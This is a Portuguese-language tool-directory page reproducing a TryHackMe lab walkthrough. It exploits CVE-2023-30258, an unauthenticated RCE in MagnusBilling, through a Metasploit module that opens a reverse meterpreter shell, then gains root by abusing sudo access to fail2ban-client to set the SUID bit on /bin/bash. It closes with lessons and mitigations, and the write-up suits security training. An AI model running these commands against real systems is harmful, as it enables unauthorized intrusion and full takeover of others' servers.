Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
THM-MagnusBilling-CVE-2023-30258-Exploit — Passo a passo explorando CVE-2023-30258 (RCE no MagnusBilling) e escalando privilégios através de uma configuração incorreta do fail2ban em um laboratório TryHackMe. Demonstra enumeração web, exploração com Metasploit e escalada de privilégios no Linux. | Kitploit
Ferramentas/GitHubGitHub/cyb3rk0ala/thm-magnusbilling-cve-2023-30258-exploit
Escalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoComando e ControleAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Labs e Prática
GitHubcyb3rk0ala/thm-magnusbilling-cve-2023-30258-exploit

THM-MagnusBilling-CVE-2023-30258-Exploit

Passo a passo explorando CVE-2023-30258 (RCE no MagnusBilling) e escalando privilégios através de uma configuração incorreta do fail2ban em um laboratório TryHackMe. Demonstra enumeração web, exploração com Metasploit e escalada de privilégios no Linux.

Ver Repositório
1há 1 mêsAinda não revisado

THM-MagnusBilling-CVE-2023-30258

⸻

🛡️ MagnusBilling RCE → Root (CVE-2023-30258)

📌 Visão Geral • Alvo: 10.145.148.203 • Plataforma: TryHackMe • Vulnerabilidade: CVE-2023-30258 • Acesso: Execução Remota de Código (RCE) sem autenticação • Escalação de Privilégios: configuração incorreta do fail2ban • Acesso Final: Root

⸻

🔍 1. Reconhecimento

Varredura de Portas

rustscan -a 10.145.148.203

📊 Portas Abertas

Porta Serviço 22 SSH 80 HTTP 3306 MySQL 5038 Asterisk Screenshot 2026-04-08 at 22 09 15

A presença do Asterisk sugere um sistema VoIP/faturamento.

⸻

🌐 2. Enumeração Web

Fuzzing de Diretórios

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c

📁 Descobertas: • /archive • /assets • /lib • /tmp • /protected

O caminho /mbilling é identificado como um possível vetor de ataque. Screenshot 2026-04-08 at 22 06 08

⸻

🚨 3. Identificação da Vulnerabilidade

CVE-2023-30258

O MagnusBilling é vulnerável a: • Execução Remota de Código (RCE) sem autenticação • Injeção de Comandos • Comprometimento total do sistema

⸻

💣 4. Exploração (Metasploit)

msfconsole

search CVE:2023-30258

use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

set RHOSTS 10.145.148.203 set LHOST tun0 set LPORT 4444 run Screenshot 2026-04-08 at 22 03 12 Screenshot 2026-04-08 at 22 03 39

⸻

🎯 Resultado

meterpreter session opened

sysinfo

OS: Linux Debian User: asterisk

Screenshot 2026-04-08 at 22 04 03

⸻

🔐 5. Acesso Inicial

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

whoami

asterisk

⸻

🏁 6. Flag do Usuário

cd /home/magnus cat user.txt

⸻

🔎 7. Escalação de Privilégios

Verificar sudo

sudo -l

(ALL) NOPASSWD: /usr/bin/fail2ban-client

Configuração incorreta crítica detectada!

Screenshot 2026-04-08 at 22 22 42

⸻

💣 8. Explorando o Fail2Ban

Adicionar uma ação maliciosa

sudo fail2ban-client set mbilling_login addaction evil

sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"

sudo fail2ban-client set mbilling_login banip 127.0.0.1

Screenshot 2026-04-08 at 22 05 14

⸻

🚀 9. Acesso Root

/bin/bash -p

id

euid=0(root)

Inicialmente, whoami retornou asterisk. Usar bash -p eleva para root.

Screenshot 2026-04-08 at 22 05 40

⸻

👑 10. Flag Root

cat /root/root.txt

⸻

🧠 11. Principais Lições • A exploração da CVE forneceu acesso inicial fácil • A enumeração web é fundamental (o ffuf identificou /mbilling) • Sudo mal configurado pode levar ao comprometimento total do sistema • O fail2ban pode ser abusado para escalação de privilégios

⸻

🛡️ 12. Mitigação • Atualizar o MagnusBilling para a versão mais recente • Remover NOPASSWD da configuração do sudo • Restringir o acesso ao fail2ban-client • Endurecer aplicações web e endpoints

⸻

💀 Conclusão

Esta máquina demonstra uma cadeia de ataque realista:

RCE Web → Shell → Escalação de Privilégios → Root

Uma combinação de vulnerabilidade + configuração incorreta levou ao comprometimento total do sistema.

Baixar ferramenta